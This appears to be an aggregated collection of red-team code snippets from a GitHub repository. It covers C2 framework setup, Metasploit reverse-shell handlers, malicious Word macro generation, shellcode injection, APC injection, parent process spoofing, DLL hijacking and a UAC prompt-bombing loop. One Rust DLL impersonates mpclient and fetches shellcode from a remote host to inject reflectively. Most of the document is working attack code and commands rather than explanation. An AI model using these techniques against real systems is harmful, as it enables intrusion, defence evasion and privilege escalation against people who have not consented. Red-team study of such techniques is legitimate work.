### Setup Adaptix C2 Framework Source: https://context7.com/lynk4/red-team/llms.txt Instructions for setting up the Adaptix C2 framework, including generating SSL certificates, starting the server and client, and configuring listeners and agents. It also covers loading extensions from the Extension-Kit. ```bash # Setup Adaptix (from official documentation) # https://adaptix-framework.gitbook.io/adaptix-framework/adaptix-c2/getting-starting/installation # Generate SSL certificate in dist folder before running openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes # Start server and client ./AdaptixServer & ./AdaptixClient # Connect with password: pass # Create listener: # 1. Right-click in Listeners panel -> Create # 2. Configure listener parameters (protocol, port, etc.) # Generate agent: # 1. Right-click on listener -> Generate Agent # 2. Save generated executable # Extension Kit for post-exploitation git clone https://github.com/Adaptix-Framework/Extension-Kit.git cd Extension-Kit make # Load extensions in AxScript -> Script Manager # Available BOF categories: # - AD-BOF: Active Directory enumeration # - Creds-BOF: Credential harvesting # - Elevation-BOF: Privilege escalation # - Execution-BOF: Code execution # - Injection-BOF: Process injection # - LateralMovement-BOF: Network pivoting ``` -------------------------------- ### Install Mythic C2 Framework Dependencies Source: https://github.com/lynk4/red-team/blob/main/C2 server/Mythic C2/README.md Executes the installation script for the Mythic C2 framework on a Kali Linux system. This script automates the setup of Docker and necessary container configurations. ```bash sudo ./install_docker_kali.sh ``` -------------------------------- ### Start Mythic C2 Services Source: https://github.com/lynk4/red-team/blob/main/C2 server/Mythic C2/README.md Initiates the Mythic C2 framework services using the CLI tool. This command starts all necessary containers and background processes for the framework to operate. ```bash sudo ./mythic-cli start ``` -------------------------------- ### Install Mythic C2 Profile from GitHub Source: https://github.com/lynk4/red-team/blob/main/C2 server/Mythic C2/README.md Installs a Mythic C2 communication profile by providing its GitHub repository URL. This enables the framework to communicate with agents using the specified protocol. ```bash sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http ``` -------------------------------- ### Launch an Executable using CreateProcessW Source: https://github.com/lynk4/red-team/blob/main/Windows API for Red Team/Windows API Functions for Pentesters and Red Teamers/README.md Shows how to spawn a new process using the CreateProcessW API. This example initializes the STARTUPINFOW and PROCESS_INFORMATION structures, executes Notepad, and demonstrates proper handle cleanup. ```C++ #include #include int main() { STARTUPINFOW si = { 0 }; // Startup configuration struct PROCESS_INFORMATION pi = { 0 }; // Receives info about the created process si.cb = sizeof(si); // Required: set the size of the structure LPCWSTR appName = L"C:\\Windows\\System32\\notepad.exe"; // Program to run // Attempt to create the new process BOOL success = CreateProcessW( appName, // Application name NULL, // Command line (optional) NULL, // Process security attributes NULL, // Thread security attributes FALSE, // Inherit handles? 0, // Creation flags NULL, // Environment (inherit from parent) NULL, // Current directory (use parentโ€™s) &si, // Pointer to STARTUPINFOW structure &pi // Pointer to PROCESS_INFORMATION structure ); if (success) { std::wcout << L"Process created. PID: " << pi.dwProcessId << std::endl; // Optionally wait for the process to exit WaitForSingleObject(pi.hProcess, INFINITE); // Clean up handles CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } else { std::wcerr << L"Failed to create process. Error: " << GetLastError() << std::endl; } return 0; } ``` -------------------------------- ### Install Multiple Mythic C2 Agents and Wrappers Source: https://github.com/lynk4/red-team/blob/main/C2 server/Mythic C2/README.md Installs several Mythic C2 agents (Apollo, Athena) and a wrapper (scarecrow_wrapper) from their respective GitHub repositories. This command allows for bulk installation of agent functionalities. ```bash sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo sudo ./mythic-cli install github https://github.com/MythicAgents/Athena sudo ./mythic-cli install github https://github.com/MythicAgents/scarecrow_wrapper ``` -------------------------------- ### Install Mythic C2 Agent from GitHub Source: https://github.com/lynk4/red-team/blob/main/C2 server/Mythic C2/README.md Installs a Mythic C2 agent by providing the GitHub repository URL. The framework will clone and set up the specified agent, making it available for payload generation. ```bash sudo ./mythic-cli install github https://github.com/MythicAgents/apfell ``` -------------------------------- ### C Shellcode Injection Example for Windows Source: https://github.com/lynk4/red-team/blob/main/maldev/Classic injection/README.md This C code snippet demonstrates a classic process injection technique on Windows. It allocates memory in a target process, writes shellcode to it, and executes it using a remote thread. The shellcode provided is designed to spawn 'calc.exe'. This example relies on standard Windows API functions. ```c #include "Windows.h" // Windows API header for process/memory/thread functions int main(int argc, char *argv[]) { // Shellcode payload (this one spawns calc.exe, generated with msfvenom) unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" // Raw shellcode bytes /* ... (rest of shellcode bytes) ... */ "\x63\x61\x6c\x63\x00"; // Shellcode likely spawns calculator // Open the target process using its PID passed as a command-line argument (argv[1]) HANDLE hprocess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(argv[1])); // Allocate memory inside the target process for the shellcode (read, write, execute permissions) LPVOID shellmem = VirtualAllocEx( hprocess, NULL, sizeof buf, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // Write the shellcode into the allocated memory inside the target process WriteProcessMemory(hprocess, shellmem, buf, sizeof buf, NULL); // Create a new thread in the target process that starts executing the shellcode HANDLE malthread = CreateRemoteThread( hprocess, NULL, 0, (LPTHREAD_START_ROUTINE)shellmem, NULL, 0, NULL ); // Exit the injector (the injected shellcode keeps running in the target process) return 0; } ``` -------------------------------- ### Setup Metasploit Listener for Callback Source: https://context7.com/lynk4/red-team/llms.txt Configures a Metasploit multi-handler to listen for incoming reverse TCP connections from a compromised host. This is typically used after a payload has been delivered and executed. ```bash # Setup listener for callback msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.125.103 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > set EXITFUNC thread msf6 exploit(multi/handler) > exploit ``` -------------------------------- ### Get System Information with Meterpreter Source: https://github.com/lynk4/red-team/blob/main/TTPs/FIN6 Adversary Emulation/FIN6 Active Directory Enumeration/README.md Retrieves detailed system information from the target machine using the 'sysinfo' command within Meterpreter. This includes OS version, architecture, domain, and logged-on users. No specific dependencies are required beyond a Meterpreter session. ```bash meterpreter > sysinfo Computer : TARGETDC OS : Windows Server 2019 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : MAD Logged On Users : 13 Meterpreter : x86/windows ``` -------------------------------- ### Deploy and Configure Mythic C2 Framework Source: https://context7.com/lynk4/red-team/llms.txt Provides commands for installing the Mythic C2 framework on Kali Linux and setting up agents and C2 profiles. It includes steps for service management and initial configuration. ```bash git clone https://github.com/its-a-feature/Mythic --depth 1 --single-branch cd Mythic sudo ./install_docker_kali.sh sudo make sudo ./mythic-cli start sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http ``` -------------------------------- ### Clone Mythic C2 Repository Source: https://github.com/lynk4/red-team/blob/main/C2 server/Mythic C2/README.md Clones the official Mythic C2 framework repository from GitHub using a shallow clone to save disk space and time. This is the first step in the installation process. ```bash git clone https://github.com/its-a-feature/Mythic --depth 1 --single-branch cd Mythic ``` -------------------------------- ### Generate Mythic C2 CLI Tool Source: https://github.com/lynk4/red-team/blob/main/C2 server/Mythic C2/README.md Builds the Mythic command-line interface (CLI) tool after the framework's dependencies have been installed. This enables interaction with the Mythic server via terminal commands. ```bash sudo make ``` -------------------------------- ### Start Python HTTP Server for Payload Transfer Source: https://github.com/lynk4/red-team/blob/main/C2 server/Mythic C2/README.md Initiates a simple Python HTTP server in the current directory. This is commonly used to serve generated payloads to target machines over a local network. ```bash python3 -m http.server 80 ``` -------------------------------- ### Get PEB and Parent PID using NtQueryInformationProcess in C++ Source: https://github.com/lynk4/red-team/blob/main/Windows API for Red Team/Windows API Functions for Pentesters and Red Teamers/README.md This C++ code retrieves the Process Environment Block (PEB) address and the parent process ID (InheritedFromUniqueProcessId) by calling the NtQueryInformationProcess API. It requires the Windows SDK headers and dynamically resolves the API from ntdll.dll. The function returns the PEB address and parent PID on success, or an error code. ```cpp #include #include #include // Define a custom struct to avoid conflict with SDK typedef struct _MY_PROCESS_BASIC_INFORMATION { PVOID Reserved1; PPEB PebBaseAddress; PVOID Reserved2[2]; ULONG_PTR UniqueProcessId; ULONG_PTR InheritedFromUniqueProcessId; } MY_PROCESS_BASIC_INFORMATION; // Function pointer to NtQueryInformationProcess typedef NTSTATUS(NTAPI* NtQueryInformationProcess_t)( HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG ); int main() { DWORD pid = GetCurrentProcessId(); HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid); if (!hProcess) { std::cerr << "Failed to open process. Error: " << GetLastError() << std::endl; return 1; } // Resolve NtQueryInformationProcess from ntdll HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); NtQueryInformationProcess_t NtQueryInformationProcess = (NtQueryInformationProcess_t)GetProcAddress(hNtdll, "NtQueryInformationProcess"); if (!NtQueryInformationProcess) { std::cerr << "Could not resolve NtQueryInformationProcess" << std::endl; CloseHandle(hProcess); return 1; } MY_PROCESS_BASIC_INFORMATION pbi = {}; ULONG returnLength = 0; NTSTATUS status = NtQueryInformationProcess( hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength ); if (status == 0) { std::cout << "PEB Address: " << pbi.PebBaseAddress << std::endl; std::cout << "Parent PID : " << pbi.InheritedFromUniqueProcessId << std::endl; } else { std::cerr << "NtQueryInformationProcess failed. NTSTATUS: 0x" << std::hex << status << std::endl; } CloseHandle(hProcess); return 0; } ``` -------------------------------- ### Enumerate Active Directory Computers with AdFind Source: https://github.com/lynk4/red-team/blob/main/TTPs/FIN6 Adversary Emulation/FIN6 Active Directory Enumeration/README.md Uses the AdFind utility to query for all objects with the category 'computer' and outputs the results to a text file. This is a standard method for identifying domain-joined systems during network reconnaissance. ```bash adfind.exe -f "objectcategory=computer" > ad_computers.txt type ad_computers.txt ``` -------------------------------- ### Navigate Directories with PowerShell in Meterpreter Source: https://github.com/lynk4/red-team/blob/main/TTPs/FIN6 Adversary Emulation/FIN6 Active Directory Enumeration/README.md Loads the PowerShell extension in Meterpreter and executes directory navigation commands ('pwd', 'cd'). This allows for exploring the file system of the target machine. Requires the PowerShell extension to be loaded. ```bash meterpreter > load powershell Loading extension powershell...Success. meterpreter > powershell_shell PS > pwd Path ---- C:\Windows\system32 PS > cd C:\Users\Public PS > pwd Path ---- C:\Users\Public PS > ``` -------------------------------- ### Create Process with Windows API (C++) Source: https://context7.com/lynk4/red-team/llms.txt This C++ code snippet demonstrates how to create a new process using the `CreateProcessW` function from the Windows API. It includes basic error handling and process handle management. ```cpp // Example 1: Create a new process #include #include int main() { STARTUPINFOW si = { 0 }; PROCESS_INFORMATION pi = { 0 }; si.cb = sizeof(si); LPCWSTR appName = L"C:\\Windows\\System32\\notepad.exe"; BOOL success = CreateProcessW( appName, // Application name NULL, // Command line NULL, // Process security attributes NULL, // Thread security attributes FALSE, // Inherit handles 0, // Creation flags NULL, // Environment NULL, // Current directory &si, // Startup info &pi // Process information ); if (success) { std::wcout << L"Process PID: " << pi.dwProcessId << std::endl; WaitForSingleObject(pi.hProcess, INFINITE); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } return 0; } ``` -------------------------------- ### Enumerate Subnets Source: https://github.com/lynk4/red-team/blob/main/TTPs/FIN6 Adversary Emulation/FIN6 Active Directory Enumeration/README.md Commands to list all subnets defined in the Active Directory site configuration using AdFind or PowerShell. ```bash adfind.exe -subnets -f "objectcategory=subnet" > ad_subnet.txt ``` ```powershell Get-ADReplicationSubnet -Filter * > ad_subnets_ps.txt ``` -------------------------------- ### Configure Cargo.toml for DLL Compilation Source: https://github.com/lynk4/red-team/blob/main/maldev/DLL Hijack/README.md Configuration file for the Rust project, setting the crate type to 'cdylib' and including necessary dependencies like 'bolus' for injection and 'windows' for Win32 API access. ```toml [package] name = "mpclient" version = "0.48.0" edition = "2024" [lib] crate-type = ["cdylib"] [dependencies] bolus = "0.3.0" [dependencies.windows] version = "0.48.0" features = [ "Win32_Foundation", "Win32_System_SystemServices", "Win32_Security", "Win32_System_Memory", "Win32_System_Threading", "Win32_System_Diagnostics_Debug", "Win32_UI_WindowsAndMessaging" ] ``` -------------------------------- ### Detect Debugger Presence using IsDebuggerPresent in C++ Source: https://github.com/lynk4/red-team/blob/main/Windows API for Red Team/Windows API Functions for Pentesters and Red Teamers/README.md This C++ code checks if a debugger is currently attached to the process using the IsDebuggerPresent API. It's a simple and common technique for anti-debugging. The function returns a non-zero value if a debugger is present, and zero otherwise. The example prints a message indicating whether a debugger was detected. ```cpp #include #include int main() { if (IsDebuggerPresent()) { std::cout << "Debugger detected. Exiting..." << std::endl; return 1; } else { std::cout << "No debugger detected. Continuing execution." << std::endl; } // Proceed with normal execution... return 0; } ``` -------------------------------- ### Perform Parent Process Spoofing using Win32 API Source: https://github.com/lynk4/red-team/blob/main/maldev/process spoofing/README.md This C++ code locates a target process ID, initializes a process thread attribute list, and uses UpdateProcThreadAttribute to set the parent process handle. It then launches a new process (Notepad) with the spoofed parent attribute using CreateProcessA. ```cpp #include #include #include #include #include #include DWORD GetPidByName(const wchar_t* pName) { PROCESSENTRY32 pEntry; HANDLE snapshot; pEntry.dwSize = sizeof(PROCESSENTRY32); snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (Process32First(snapshot, &pEntry) == TRUE) { while (Process32Next(snapshot, &pEntry) == TRUE) { if (wcscmp(pEntry.szExeFile, pName) == 0) { return pEntry.th32ProcessID; } } } return 0; } int main(void) { STARTUPINFOEX info = { sizeof(info) }; PROCESS_INFORMATION processInfo; SIZE_T cbAttributeListSize = 0; PPROC_THREAD_ATTRIBUTE_LIST pAttributeList = NULL; HANDLE hExploreProcess = NULL; DWORD dwExplorerPid = GetPidByName(L"explorer.exe"); if (dwExplorerPid == 0) dwExplorerPid = GetCurrentProcessId(); InitializeProcThreadAttributeList(NULL, 1, 0, &cbAttributeListSize); pAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, cbAttributeListSize); InitializeProcThreadAttributeList(pAttributeList, 1, 0, &cbAttributeListSize); hExploreProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwExplorerPid); UpdateProcThreadAttribute(pAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hExploreProcess, sizeof(HANDLE), NULL, NULL); info.lpAttributeList = pAttributeList; CreateProcessA(NULL, (LPSTR)"notepad.exe", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, (LPSTARTUPINFOA)&info.StartupInfo, &processInfo); printf("Malware PID: %d \n", GetCurrentProcessId()); printf("Explorer PID: %d \n", dwExplorerPid); printf("Notepad PID: %d \n", processInfo.dwProcessId); Sleep(30000); DeleteProcThreadAttributeList(pAttributeList); CloseHandle(hExploreProcess); return 0; } ``` -------------------------------- ### Malicious DLL Project Configuration (Cargo.toml) Source: https://github.com/lynk4/red-team/blob/main/maldev/DLL Hijack/README.md Configuration file for a Rust project set to compile as a dynamic library (cdylib). It includes the necessary Windows crate dependencies for system interaction and message box display. ```toml [package] name = "evildll" version = "0.48.0" edition = "2024" [lib] crate-type = ["cdylib"] [dependencies] [dependencies.windows] version = "0.48.0" features = [ "Win32_Foundation", "Win32_System_SystemServices", "Win32_Security", "Win32_System_Memory", "Win32_System_Threading", "Win32_System_WindowsProgramming", "Win32_System_Diagnostics_Debug", "Win32_UI_WindowsAndMessaging" ] ``` -------------------------------- ### Shellcode Generation with msfvenom Source: https://github.com/lynk4/red-team/blob/main/maldev/DLL Hijack/README.md This command uses msfvenom, a payload generation tool from the Metasploit Framework, to create raw shellcode. The shellcode is designed to execute 'calc.exe' on a 64-bit Windows system. The output is saved to a file named 'shellcode.bin'. ```bash /opt/metasploit-framework/bin/msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o shellcode.bin ``` -------------------------------- ### DLL Hijacking Proof-of-Concept Implementation Source: https://github.com/lynk4/red-team/blob/main/maldev/dll hijacking/README.md This snippet contains the source code for a target application that attempts to load a specific DLL and the source code for a malicious DLL that executes code upon being loaded by the process. ```c #include #include int main(void) { HINSTANCE hDll; //load dll hDll = LoadLibrary(TEXT("lockon.dll")); //if dll was loaded if (hDll != NULL) { printf("DLL found.."); } else { printf("DLL not found"); } return 0; } ``` ```c #include BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpREserved) { switch (dwReason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Hey baby.....", "from kant", MB_ICONERROR | MB_OK); break; } return TRUE; } ``` -------------------------------- ### Enumerate Groups Source: https://github.com/lynk4/red-team/blob/main/TTPs/FIN6 Adversary Emulation/FIN6 Active Directory Enumeration/README.md Command to retrieve group objects from Active Directory using the AdFind tool. ```bash adfind.exe -f "objectcategory=group" > ad_group.txt ``` -------------------------------- ### APC Injection Implementation in C++ Source: https://github.com/lynk4/red-team/blob/main/maldev/process injection/README.md This C++ code demonstrates how to perform APC injection. It spawns a process (notepad.exe) in a suspended state, allocates memory within it, writes a payload, queues an APC to execute the payload, and then resumes the process. Dependencies include the Windows API. ```cpp #include #include char payload[] = ""; // ๐ŸŒฎ YOUR MALICIOUS CODE GOES HERE! unsigned int payload_len = sizeof(payload); // ๐Ÿ“ˆ AUTO-MAGICALLY CALCULATES CODE SIZE int main(int argc, char **argv) { int pid = 0; HANDLE hProc = NULL; STARTUPINFO si; // ๐Ÿ“ BLUEPRINT FOR NEW PROCESS PROCESS_INFORMATION pi; // ๐Ÿ“Š PROCESS ID CARD void* newMemorySpace; // ๐Ÿชง CLEAN SLATE TECHNIQUE ZeroMemory( &si, sizeof(si)); si.cb = sizeof(si); ZeroMemory( &pi, sizeof(pi)); // ๐ŸŽฅ CREATE NOTEPAD BUT FREEZE IT MID-AIR! CreateProcessA(0, "notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi); // โน PAUSE BUTTON - PRESS ENTER TO CONTINUE getchar(); // ๐Ÿฌ ALLOCATE STEALTH MEMORY IN NOTEPAD'S BRAIN newMemorySpace = VirtualAllocEx(pi.hProcess, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ); // โœ WRITE YOUR PAYLOAD INTO NOTEPAD'S MEMORY WriteProcessMemory(pi.hProcess, newMemorySpace, (PVOID) payload, (SIZE_T) payload_len, (SIZE_T *) NULL); // ๐Ÿ’€ SLIP YOUR CODE INTO NOTEPAD'S THOUGHT PROCESS QueueUserAPC((PAPCFUNC)newMemorySpace, pi.hThread, NULL); // โ–ถ UNFREEZE NOTEPAD - NOW EXECUTING YOUR CODE! ResumeThread(pi.hThread); return 0; } ``` -------------------------------- ### Rust Spoofing MpQueryEngineConfigDword for DLL Hijacking Source: https://github.com/lynk4/red-team/blob/main/maldev/DLL Hijack/README.md This Rust code snippet demonstrates how to spoof a specific imported function, MpQueryEngineConfigDword, which is identified as a potential entry point for DLL hijacking. By defining this function and having it call the main function, it allows the malicious DLL to intercept and control the execution flow. ```rust #[unsafe(no_mangle)]extern "C" fn MpQueryEngineConfigDword() { main(); } ``` -------------------------------- ### Implement DLL Hijacking with Rust Source: https://context7.com/lynk4/red-team/llms.txt Demonstrates how to create a malicious DLL using Rust that exports specific functions to intercept calls. This technique exploits the Windows DLL search order to execute arbitrary code when a legitimate application loads the hijacked library. ```rust use windows::{ core::PCSTR, Win32::{ UI::WindowsAndMessaging::{MessageBoxA, MESSAGEBOX_STYLE}, Foundation::{BOOL, HANDLE, HWND}, } }; #[unsafe(no_mangle)] extern "C" fn MpQueryEngineConfigDword() { main(); } #[unsafe(no_mangle)] extern "C" fn MpGetSampleChunk() { main(); } #[unsafe(no_mangle)] extern "C" fn MpClientUtilExportFunctions() { main(); } #[unsafe(no_mangle)] extern "C" fn main() { unsafe { MessageBoxA( HWND(0), PCSTR("DLL Hijacked!\x00".as_ptr()), PCSTR("Success\x00".as_ptr()), MESSAGEBOX_STYLE(0) ); } } #[unsafe(no_mangle)] extern "system" fn DllMain( _dll_module: HANDLE, _call_reason: u32, _lpv_reserved: &u32 ) -> BOOL { BOOL(1) } ``` -------------------------------- ### Display a Message Box using MessageBoxW Source: https://github.com/lynk4/red-team/blob/main/Windows API for Red Team/Windows API Functions for Pentesters and Red Teamers/README.md Demonstrates how to invoke the Windows MessageBoxW function to display a modal dialog. It requires the Windows.h header and accepts parameters for the message body, window title, and button configuration. ```C++ #include // Required for Windows API functions int main() { MessageBoxW( NULL, // hWnd: No owner window (NULL) L"Hello from Lock On!", // lpText: The message body L"MessageBox Title", // lpCaption: The title of the window MB_OK | MB_ICONINFORMATION // uType: Button style and icon type ); return 0; } ``` -------------------------------- ### Malicious DLL Implementation (lib.rs) Source: https://github.com/lynk4/red-team/blob/main/maldev/DLL Hijack/README.md A Rust implementation of a DLL that triggers a MessageBox upon loading. It uses DllMain as the entry point to execute custom code when the library is loaded by a host process. ```rust use windows::{ core::PCSTR, Win32::{ UI::WindowsAndMessaging::{ MessageBoxA, MESSAGEBOX_STYLE }, Foundation::{ BOOL, HANDLE, HWND, } } }; #[unsafe(no_mangle)] extern "C" fn main() { unsafe { MessageBoxA( HWND(0), PCSTR("Dll hijacked\x00".as_ptr()), PCSTR("oh baby..\x00".as_ptr()), MESSAGEBOX_STYLE(0) ); } } #[unsafe(no_mangle)] #[allow(non_snake, unused_variables)] extern "system" fn DllMain( dll_module: HANDLE, call_reason: u32, lpv_reserved: &u32 ) -> BOOL { match call_reason { _ => { main(); return BOOL(1); } } } ``` -------------------------------- ### Enumerate Organizational Units Source: https://github.com/lynk4/red-team/blob/main/TTPs/FIN6 Adversary Emulation/FIN6 Active Directory Enumeration/README.md Commands to retrieve all Organizational Units in the domain. Uses AdFind to filter by object category or PowerShell's Get-ADOrganizationalUnit cmdlet. ```bash adfind.exe -f "objectcategory=organizationalUnit" > ad_ous.txt ``` ```powershell Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, DistinguishedName -A > ad_ous_ps.txt ``` -------------------------------- ### Query Process Information using NTAPI (C++) Source: https://context7.com/lynk4/red-team/llms.txt This C++ code snippet shows how to query process information, specifically the PEB address, using the `NtQueryInformationProcess` function from NTAPI. It dynamically loads the function from ntdll.dll. ```cpp // Example 2: Query process information using NTAPI #include #include typedef NTSTATUS(NTAPI* NtQueryInformationProcess_t)( HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG); int main() { HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId()); HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); auto NtQueryInformationProcess = (NtQueryInformationProcess_t) GetProcAddress(hNtdll, "NtQueryInformationProcess"); PROCESS_BASIC_INFORMATION pbi = {}; ULONG returnLength = 0; NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength); std::cout << "PEB Address: " << pbi.PebBaseAddress << std::endl; CloseHandle(hProcess); return 0; } ``` -------------------------------- ### Create Shadow Copy of C: Drive using VSS Source: https://github.com/lynk4/red-team/blob/main/TTPs/FIN6 Adversary Emulation/FIN6 File Exfiltration Over FTP/README.md This command utilizes the Volume Shadow Copy Service (VSS) to create a point-in-time snapshot of the C: drive. This is useful for backing up or accessing files that are in use. The command requires administrative privileges. ```bash vssadmin create shadow /for=C: ``` -------------------------------- ### Cross-Compile C++ for Windows on Linux Source: https://github.com/lynk4/red-team/blob/main/maldev/process injection/README.md Use the MinGW-w64 compiler suite to cross-compile the C++ source code into a Windows executable from a Linux environment. ```bash x86_64-w64-mingw32-g++ mark2.cpp -o mark2 -I/usr/share/mingw-w64/include -L/usr/lib -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -Wnarrowing -fexceptions ``` -------------------------------- ### Rust DllMain Function for DLL Hijacking Source: https://github.com/lynk4/red-team/blob/main/maldev/DLL Hijack/README.md This Rust code defines the DllMain function, the entry point for a DLL. It's designed to be called by the operating system when the DLL is loaded or unloaded. In this context, it's part of a DLL hijacking technique where it returns success to allow the hijacked process to continue execution. ```rust #[unsafe(no_mangle)] #[allow(non_snake, unused_variables)] extern "system" fn DllMain( dll_module: HANDLE, call_reason: u32, lpv_reserved: &u32 ) -> BOOL { match call_reason { _ => { return BOOL(1); } } } ``` -------------------------------- ### Implement Malicious DLL with Reflective Injection in Rust Source: https://github.com/lynk4/red-team/blob/main/maldev/DLL Hijack/README.md This Rust code defines a DLL that exports various MpClient functions to ensure compatibility while executing a main function that fetches and injects shellcode via the bolus library. It includes a DllMain entry point and uses the 'cdylib' crate type for dynamic linking. ```rust use windows::core::PCSTR; use windows::Win32::UI::WindowsAndMessaging::{MessageBoxA, MESSAGEBOX_STYLE}; use windows::Win32::Foundation::{BOOL, HANDLE, HWND}; use bolus::{load, inject, injectors::{InjectionType, InjectorType}}; #[unsafe(no_mangle)] extern "C" fn MpQueryEngineConfigDword() { main(); } // ... (additional exported functions omitted for brevity) #[unsafe(no_mangle)] extern "C" fn main() { let injector_type = InjectorType::Url("http://10.196.248.216/shellcode.bin".to_string(), true); let injector = load(injector_type).unwrap(); inject(injector, InjectionType::Reflect, true).unwrap(); } #[unsafe(no_mangle)] #[allow(non_snake, unused_variables)] extern "system" fn DllMain(dll_module: HANDLE, call_reason: u32, lpv_reserved: &u32) -> BOOL { match call_reason { _ => { return BOOL(1); } } } ``` -------------------------------- ### Create Word Macro Payload with Metasploit Source: https://github.com/lynk4/red-team/blob/main/TTPs/FIN6 Adversary Emulation/FIN6 Office Macro Initial Access/README.md This snippet demonstrates how to use Metasploit Framework to generate a malicious Word macro document (msf.docm). It involves searching for the appropriate module, setting payload options like LHOST and LPORT, and executing the exploit to create the payload file. ```bash sudo msfconsole -q msf6 > search word_macro Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/fileformat/office_word_macro 2012-01-10 excellent No Microsoft Office Word Malicious Macro Execution 1 \_ target: Microsoft Office Word on Windows . . . . 2 \_ target: Microsoft Office Word on Mac OS X (Python) . . . . Interact with a module by name or index. For example info 2, use 2 or use exploit/multi/fileformat/office_word_macro After interacting with a module you can manually set a TARGET with set TARGET 'Microsoft Office Word on Mac OS X (Python)' msf6 > use 0 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(multi/fileformat/office_word_macro) > show options Module options (exploit/multi/fileformat/office_word_macro): Name Current Setting Required Description ---- --------------- -------- ----------- CUSTOMTEMPLATE no A docx file that will be used as a template to build the exploit FILENAME msf.docm yes The Office document macro file (docm) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.125.103 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port **DisablePayloadHandler: True (no handler will be created!) Exploit target: Id Name -- ---- 0 Microsoft Office Word on Windows View the full module info with the info, or info -d command. msf6 exploit(multi/fileformat/office_word_macro) > exploit [*] Using template: /usr/share/metasploit-framework/data/exploits/office_word_macro/template.docx [*] Injecting payload in document comments [*] Injecting macro and other required files in document [*] Finalizing docm: msf.docm [+] msf.docm stored at /root/.msf4/local/msf.docm ``` -------------------------------- ### Execute UAC Prompt Bombing via PowerShell Source: https://context7.com/lynk4/red-team/llms.txt Automates UAC elevation requests by repeatedly invoking signed Microsoft binaries (LOLBins) like pcalua.exe or wlrmdr.exe. This exploits user fatigue to gain administrative privileges. ```powershell try {throw ""} catch { while (-not $?) { try { Start-Process pcalua.exe -ArgumentList "-a cmd.exe" -Verb RunAs } catch { Write-Error "" -ErrorAction SilentlyContinue } } } try {throw ""} catch { while (-not $?) { try { Start-Process wlrmdr.exe -ArgumentList "-s 3600 -f 0 -t _ -m _ -a 11 -u cmd.exe" -Verb RunAs } catch { Write-Error "" -ErrorAction SilentlyContinue } } } ``` -------------------------------- ### Configure Discord C2 Profile Source: https://context7.com/lynk4/red-team/llms.txt Details the configuration required to use Discord as a command and control channel. This involves setting up a Discord bot and updating the Mythic profile configuration. ```json { "bot_token": "YOUR_BOT_TOKEN", "channel_id": "YOUR_CHANNEL_ID" } ``` -------------------------------- ### Cross-compile the C++ malware Source: https://github.com/lynk4/red-team/blob/main/maldev/Undocumented WinAPI/README.md Use the MinGW-w64 compiler suite to cross-compile the C++ source code into a Windows-compatible executable on a Linux environment. ```bash x86_64-w64-mingw32-g++ apc_inject.cpp -o apcinject-1.exe ``` -------------------------------- ### Exporting Functions with Rust Attributes Source: https://github.com/lynk4/red-team/blob/main/maldev/DLL Hijack/README.md This snippet shows how to define exported functions in Rust using `extern "C" fn` and `#[unsafe(no_mangle)]`. It includes a placeholder `main()` function call within each exported function, intended to be replaced with actual logic. This pattern is common when creating DLLs that need to expose specific functions to other applications. ```rust use windows::{ core::PCSTR, Win32::{ UI::WindowsAndMessaging::{ MessageBoxA, MESSAGEBOX_STYLE }, Foundation::{ BOOL, HANDLE, HWND, } } }; #[unsafe(no_mangle)] extern "C" fn MpQueryEngineConfigDword() { main(); } #[unsafe(no_mangle)] extern "C" fn MpGetSampleChunk() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConveySampleSubmissionResult() { main(); } #[unsafe(no_mangle)] extern "C" fn MpSampleSubmit() { main(); } #[unsafe(no_mangle)] extern "C" fn MpSampleQuery() { main(); } #[unsafe(no_mangle)] extern "C" fn MpUpdateStart() { main(); } #[unsafe(no_mangle)] extern "C" fn MpClientUtilExportFunctions() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigInitialize() { main(); } #[unsafe(no_mangle)] extern "C" fn MpConfigOpen() { main(); } 